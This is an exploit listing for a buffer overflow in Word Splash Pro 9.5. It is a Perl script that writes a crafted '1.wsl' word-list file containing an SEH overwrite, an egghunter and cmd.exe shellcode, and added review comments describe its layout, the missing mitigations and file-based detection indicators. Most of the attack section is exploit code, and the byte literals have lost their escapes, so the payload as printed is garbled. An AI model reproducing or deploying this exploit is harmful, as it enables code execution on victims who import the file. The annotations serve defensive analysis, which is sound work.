Word Splash Pro 9.5 Buffer Overflow
Posted on 20 December 2010
# Exploit Title: Word Splash Pro <= 9.5 Buffer Overflow -EggHunter-
# Software Link: http://www.chronasoft.com/software/wordsplashpro
# Version: <= 9.5
# Tested on: Win XP SP3 French
# Date: 20/12/2010
# Author: h1ch4m
#Email: h1ch4m@live.fr
#Home: Net-Effects.blogspot.com
#Greetz : Peter Van Eeckhoutte, Exploit-Database Team, Zhir0
#Note: tested on version 9.5 & 8.3, you may have to change the address of pop pop ret according to your sp & the program version
# triggering details: file->Word list->Import then click on Word List Builder button
#
# --- Review notes (defensive reading of this listing) ---
# The script's only side effect is writing one file, "1.wsl", into the
# current directory; nothing is executed here. The memory corruption the
# author describes happens later, inside the target program, when that
# word-list file is imported (see "triggering details" above).
#
# File layout, in write order:  egg . shellcode . junk . nseh . seh . egghunter
#   * $egg and $shellcode come first, $junk pads them out to $size bytes,
#     then a 4-byte nSEH / SEH pair and the egghunter follow.
#   * The nSEH/SEH pair is the classic SEH-record overwrite: a short jump in
#     nSEH and a fixed "pop pop ret" gadget address in SEH (author's
#     comments). That fixed address is why the author warns it must be
#     re-derived per service pack / program version; SafeSEH, DEP and ASLR
#     are the mitigations this layout assumes are absent.
#
# Detection / triage hints grounded in this file:
#   * A .wsl word list of roughly $size (4112) bytes consisting mostly of a
#     single repeated byte, with the literal tag "w00tw00t" near the start,
#     is a strong file-based indicator. The egghunter also carries the same
#     4-byte tag ("x77x30x30x74" = "w00t") so the tag appears twice in the file.
#   * "CRDE2000.DLL" is the module the author took the gadget from; whether
#     it lacks SafeSEH is not shown here - verify before relying on it.
#
# NOTE(review): in this copy the byte-string literals appear to have lost
# their backslash escapes (they read "x90", not "\x90"). As printed they are
# plain ASCII text, so the byte values should be treated as unverified.
my $file = "1.wsl";            # output path, relative to the cwd
my $size = 4112;               # total length of egg + shellcode + junk
my $nseh = "xebx06x90x90"; # jump 6 bytes
my $seh = pack('V', 0x01de44dc); # pop pop ret from CRDE2000.DLL
my $egg = "w00tw00t";          # egg tag the hunter searches memory for
my $egghunter = "x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8". "x77x30x30x74". "x8BxFAxAFx75xEAxAFx75xE7xFFxE7";
# Shellcode : windows/XP sp2 (FR) Sellcode cmd.exe 32 bytes - Mountassif Moad aka Stack
# http://www.exploit-db.com/exploits/13510/
my $shellcode = "x8BxECx33xFFx57". "xC6x45xFCx63xC6x45". "xFDx6DxC6x45xFEx64". "xC6x45xF8x01x8D". "x45xFCx50xB8xC7x93". "xBFx77xFFxD0";
# Filler: the "x90" literal repeated until egg + shellcode + junk == $size.
my $junk = "x90" x ($size-length($egg.$shellcode));
# NOTE(review): no strict/warnings, $FILE is an undeclared package global,
# and open() is the 2-arg form with no error check - if the open fails the
# script still prints "File Created successfully".
open($FILE,">$file");
print $FILE $egg.$shellcode.$junk.$nseh.$seh.$egghunter;
close($FILE);
print "File Created successfully ";
sleep(1);                      # presumably just to keep the console visible